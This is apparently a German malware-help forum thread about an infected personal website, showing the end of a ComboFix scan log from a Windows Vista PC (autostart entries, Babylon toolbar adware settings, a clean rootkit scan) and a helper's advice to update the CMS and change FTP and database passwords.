"IgfxTray"="c:\windows\system32\igfxtray.exe" [2008-11-06 150040]
"HotKeysCmds"="c:\windows\system32\hkcmd.exe" [2008-11-06 178712]
"Persistence"="c:\windows\system32\igfxpers.exe" [2008-11-06 154136]
"WirelessAssistant"="c:\program files\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe" [2009-09-01 499768]
"SynTPEnh"="c:\program files\Synaptics\SynTP\SynTPEnh.exe" [2010-06-04 1791272]
"HP Software Update"="c:\program files\Hp\HP Software Update\HPWuSchd2.exe" [2007-05-08 54840]
"SoundMAXPnP"="c:\program files\Analog Devices\Core\smax4pnp.exe" [2008-12-11 1310720]
"Adobe ARM"="c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2012-12-03 946352]
"avgnt"="c:\program files\Avira\AntiVir Desktop\avgnt.exe" [2012-08-08 348664]
"APSDaemon"="c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2012-10-11 59280]
"iTunesHelper"="c:\program files\iTunes\iTunesHelper.exe" [2012-06-07 421776]
"QuickTime Task"="c:\program files\QuickTime\QTTask.exe" [2012-10-25 421888]
.
c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\
Microsoft Office.lnk - c:\program files\Microsoft Office\Office\OSA9.EXE [1999-2-17 65588]
Mozilla Thunderbird.lnk - c:\program files\Mozilla Thunderbird\thunderbird.exe [2013-1-9 389168]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"EnableUIADesktopToggle"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
"aux"=wdmaud.drv
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WudfSvc]
@="Service"
.
--- Andere Dienste/Treiber im Speicher ---
.
*NewlyCreated* - ECACHE
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
LocalServiceNoNetwork	REG_MULTI_SZ   	PLA DPS BFE mpssvc
bthsvcs	REG_MULTI_SZ   	BthServ
LocalServiceAndNoImpersonation	REG_MULTI_SZ   	FontCache
.
Inhalt des "geplante Tasks" Ordners
.
2013-02-19 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2012-06-10 15:58]
.
.
------- Zusätzlicher Suchlauf -------
.
mStart Page = about:blank
uInternet Settings,ProxyOverride = *.local
TCP: DhcpNameServer = 192.168.2.1
FF - ProfilePath - c:\users\TuS\AppData\Roaming\Mozilla\Firefox\Profiles\5j2bf9y8.default\
FF - prefs.js: browser.startup.homepage - hxxp://www.google.de/
FF - ExtSQL: 2013-02-12 13:59; FirefoxToolbar@gutscheindoktor.de; c:\users\TuS\AppData\Roaming\Mozilla\Firefox\Profiles\5j2bf9y8.default\extensions\FirefoxToolbar@gutscheindoktor.de.xpi
FF - ExtSQL: !HIDDEN! 2011-02-20 13:50; {20a82645-c095-46ed-80e3-08825760534b}; c:\windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF - user.js: extensions.BabylonToolbar.tlbrSrchUrl - hxxp://search.babylon.com/?babsrc=TB_def&mntrId=5fb987f200000000000000ffbeb5fb91&q=
FF - user.js: extensions.BabylonToolbar.id - 5fb987f200000000000000ffbeb5fb91
FF - user.js: extensions.BabylonToolbar.appId - {BDB69379-802F-4eaf-B541-F8DE92DD98DB}
FF - user.js: extensions.BabylonToolbar.instlDay - 15674
FF - user.js: extensions.BabylonToolbar.vrsn - 1.8.3.8
FF - user.js: extensions.BabylonToolbar.vrsni - 1.8.3.8
FF - user.js: extensions.BabylonToolbar_i.vrsnTs - 1.8.3.814:56
FF - user.js: extensions.BabylonToolbar.prtnrId - babylon
FF - user.js: extensions.BabylonToolbar.prdct - BabylonToolbar
FF - user.js: extensions.BabylonToolbar.aflt - babsst
FF - user.js: extensions.BabylonToolbar_i.smplGrp - none
FF - user.js: extensions.BabylonToolbar.tlbrId - irhnew
FF - user.js: extensions.BabylonToolbar.instlRef - sst
FF - user.js: extensions.BabylonToolbar.dfltLng - en
FF - user.js: extensions.BabylonToolbar.excTlbr - false
FF - user.js: extensions.BabylonToolbar.admin - false
.
- - - - Entfernte verwaiste Registrierungseinträge - - - -
.
URLSearchHooks-{7e111a5c-3d11-4f56-9463-5310c3c69025} - (no file)
SafeBoot-WudfPf
SafeBoot-WudfRd
AddRemove-Agere Systems Soft Modem - c:\windows\agrsmdel
.
.
.
**************************************************************************
.
catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, hxxp://www.gmer.net
Rootkit scan 2013-02-19 19:29
Windows 6.0.6002 Service Pack 2 NTFS
.
Scanne versteckte Prozesse... 
.
Scanne versteckte Autostarteinträge... 
.
Scanne versteckte Dateien... 
.
Scan erfolgreich abgeschlossen
versteckte Dateien: 0
.
**************************************************************************
.
--------------------- Gesperrte Registrierungsschluessel ---------------------
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0000\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
"MSCurrentCountry"=dword:000000b5
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0001\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
.
Zeit der Fertigstellung: 2013-02-19  19:31:47
ComboFix-quarantined-files.txt  2013-02-19 18:31
.
Vor Suchlauf: 10 Verzeichnis(se), 185.801.080.832 Bytes frei
Nach Suchlauf: 17 Verzeichnis(se), 185.690.263.552 Bytes frei
.
- - End Of File - - 444DFE3E87C0896BC43D3104E2BCE9D1

--- --- ---

18.02.2013, 23:20	#2
markusg /// Malware-holic	Eigene Webseite mit Malware verseucht hi hast du denn alle foren, cmfs etc aktualisiert? hab jetzt die seite noch nicht angesehen ist nur mal ein erster Hinweis. passwort für ftp und sql Datenbank geendert? __________________ __________________

Eigene Webseite mit Malware verseucht

Plagegeister aller Art und deren Bekämpfung: Eigene Webseite mit Malware verseucht